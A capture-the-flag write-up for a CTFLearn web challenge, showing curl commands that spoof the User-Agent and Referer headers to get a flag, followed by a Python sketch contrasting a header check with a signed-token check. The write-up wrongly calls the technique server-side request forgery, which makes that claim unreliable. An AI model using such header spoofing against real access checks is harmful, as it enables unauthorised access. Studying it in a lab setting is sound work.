CTFLearn - Don’t Bump Your Head(er)

16th Jul 2023

CTF, Web, Writeup

Author: Ramon Bello

A demonstration of Server-Side Request Forgery (SSRF) through a challenge from CTFLearn

Difficulty : Medium

[Image of challenge]

http://165.227.106.113/header.php

On opening the site, this message shows up:

[Image of site]

Checking the site's source...

[Image: page source]

We get the obvious user agent: Sup3rS3cr3tAg3nt. Next, I used curl.

┌──(gr33pp㉿machine)
└─$ curl -A Sup3rS3cr3tAg3nt http://165.227.106.113/header.php 
Sorry, it seems as if you did not just come from the site, "awesomesauce.com".
<!-- Sup3rS3cr3tAg3nt  -->

Setting my user agent to Sup3rS3cr3tAg3nt gave the next clue: the server requires a Referer header of awesomesauce.com to proceed.

┌──(gr33pp㉿machine)
└─$ curl -A Sup3rS3cr3tAg3nt -e awesomesauce.com http://165.227.106.113/header.php 
Here is your flag: flag{did_this_m3ss_with_y0ur_h34d}
<!-- Sup3rS3cr3tAg3nt  -->

With the two headers added to the request, we were able to trick the server into believing we are an authorised and "expected" user. This way, a server-side request forgery is performed.

flag : flag{did_this_m3ss_with_y0ur_h34d}
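
The two curl requests above succeed because the server decides access from the User-Agent and Referer headers, both of which the client sets freely. The Python sketch below is an added example, not the challenge's code (the source of header.php is not shown on this page): `header_gate` models the check implied by the responses, assuming exact string matches, and `issue_token`, `token_gate` and `SERVER_KEY` are hypothetical names for a hardened alternative that relies on a server-signed token instead.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: the expected values come from the challenge's responses; the real
# header.php is not available, so this only models the observed behaviour.
EXPECTED_AGENT = "Sup3rS3cr3tAg3nt"
EXPECTED_REFERER = "awesomesauce.com"
SERVER_KEY = secrets.token_bytes(32)  # hypothetical secret, never sent to clients


def header_gate(headers):
    """Weak gate: both inputs are chosen by the client, so they prove nothing."""
    if headers.get("User-Agent") != EXPECTED_AGENT:
        return "denied: user agent"
    if headers.get("Referer") != EXPECTED_REFERER:
        return "denied: referer"
    return "granted"


def issue_token(user, ttl=300, now=None):
    """Hypothetical helper: called by the server after real authentication."""
    now = time.time() if now is None else now
    payload = f"{user}|{int(now + ttl)}"
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def token_gate(headers, now=None):
    """Hardened gate: access depends on a MAC only the server can compute."""
    now = time.time() if now is None else now
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    parts = token.split("|")
    if scheme != "Bearer" or len(parts) != 3:
        return "denied: no token"
    user, expires, tag = parts
    expected = hmac.new(SERVER_KEY, f"{user}|{expires}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return "denied: bad signature"
    if int(expires) < now:  # safe: the value is covered by the verified MAC
        return "denied: expired"
    return "granted"
```

The same two headers that pass `header_gate` are rejected by `token_gate`, because a client cannot produce a valid tag without `SERVER_KEY`.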